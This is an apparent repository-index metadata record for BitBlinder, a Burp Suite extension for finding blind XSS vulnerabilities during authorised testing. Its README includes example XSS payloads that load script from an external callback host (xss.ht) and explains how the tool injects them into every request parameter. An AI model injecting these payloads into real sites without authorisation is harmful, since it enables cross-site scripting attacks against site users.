{"id":13542269,"url":"https://github.com/BitTheByte/BitBlinder","last_synced_at":"2025-04-02T09:33:28.198Z","repository":{"id":109046777,"uuid":"168034473","full_name":"BitTheByte/BitBlinder","owner":"BitTheByte","description":"BurpSuite extension to inject custom cross-site scripting payloads on every form/request submitted to detect blind XSS vulnerabilities","archived":false,"fork":false,"pushed_at":"2023-06-04T18:55:35.000Z","size":13,"stargazers_count":107,"open_issues_count":3,"forks_count":23,"subscribers_count":5,"default_branch":"master","last_synced_at":"2024-11-03T07:33:15.572Z","etag":null,"topics":["burp-extensions","burp-plugin","burpsuite","burpsuite-extender","jython","python"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/BitTheByte.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2019-01-28T20:45:39.000Z","updated_at":"2024-10-03T05:13:53.000Z","dependencies_parsed_at":"2023-04-05T23:33:41.699Z","dependency_job_id":null,"html_url":"https://github.com/BitTheByte/BitBlinder","commit_stats":{"total_commits":12,"total_committers":3,"mean_commits":4.0,"dds":"0.16666666666666663","last_synced_commit":"b1183cc37ee4ae3f8b432b87494889361d9de89c"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BitTheByte%2FBitBlinder","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BitTheByte%2FBitBlinder/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BitTheByte%2FBitBlinder/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BitTheByte%2FBitBlinder/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/BitTheByte","download_url":"https://codeload.github.com/BitTheByte/BitBlinder/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246789309,"owners_count":20834273,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["burp-extensions","burp-plugin","burpsuite","burpsuite-extender","jython","python"],"created_at":"2024-08-01T10:01:03.711Z","updated_at":"2025-04-02T09:33:27.892Z","avatar_url":"https://github.com/BitTheByte.png","language":"Python","readme":"# BitBlinder\n\n**THIS TOOLS IS IN EARLY BETA USE IT ON YOUR OWN RISK**  \nBurp extension helps in finding blind xss vulnerabilities by injecting xss payloads in every request passes throw BurpSuite\n```\n*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n-  Developer: Ahmed Ezzat (BitTheByte)      -\n-  Github:    https://github.com/BitTheByte -\n-  Version:   0.05b                         -\n*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n[WARNING] MAKE SURE TO EDIT THE SETTINGS BEFORE USE\n[WARNING] THIS TOOL WILL WORK FOR IN-SCOPE ITEMS ONLY\n[WARNING] THIS TOOL WILL CONSUME TOO MUCH BANDWIDTH\n```\n\n# Configuration\nGo to `Bit blinder` tab then enable it  \nSet your payloads (line separated)  \n```\n\"\u003e\u003cscript%20src=\"https://myusername.xss.ht\"\u003e\u003cscript\u003e\n\"\u003e\u003cscript%20src=\"https://myusername.xss.ht\"\u003e\u003cscript\u003e\n...\n```\nIf you added more than 1 payload enable the randomization button  \nIf you want to keep it disabled keep in mind that the tool will use the first payload only\n\n\n# How to use\n1. Load the extension to your burpsuite\n2. Click on `Bit blinder` tab then enable it  \n3. Add your target to scope **It'll only work for inscope items**\n4. Continue your hunting session **Make sure to do alot of actions [Forms,Search,...]**\n5. Monitor the output in extension's output tab\n\n**Note:** By the nature of this tool it'll make alot of requests so you may get blocked by WAF or experience slow internet connection\n\n\n# In a nutshell\n\nWhen user visits [https://example.com?vuln=123\u0026vuln2=abc](https://example.com?vuln=123\u0026vuln2=abc)  \nThis tool will generate the following 2 requests (in the background without effecting the current session)  \n1. [https://example.com?vuln=[YOUR_XSS_PAYLOAD]\u0026vuln2=abc](https://example.com?vuln=[YOUR_XSS_PAYLOAD]\u0026vuln2=abc)\n2. [https://example.com?vuln=123\u0026vuln2=[YOUR_XSS_PAYLOAD]](https://example.com?vuln=123\u0026vuln2=[YOUR_XSS_PAYLOAD])\n\nThe previous example also applies to `POST` parameters\n\n\n# Current version\n```\nVersion 0.05b\n```\n\n\n# TO-DO (By priority)\n- GUI ✓ ( A very ugly one for now.. )\n- Fix endless request loops ✓\n- Injection in headers\n- Option to exclude paramters/hosts/endpoints\n- Better output/logging system\n","funding_links":[],"categories":["Exploitation","Vulnerability Specific Extensions","Python (1887)","Python"],"sub_categories":["XSS Injection","Cross-site scripting"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FBitTheByte%2FBitBlinder","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FBitTheByte%2FBitBlinder","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FBitTheByte%2FBitBlinder/lists"}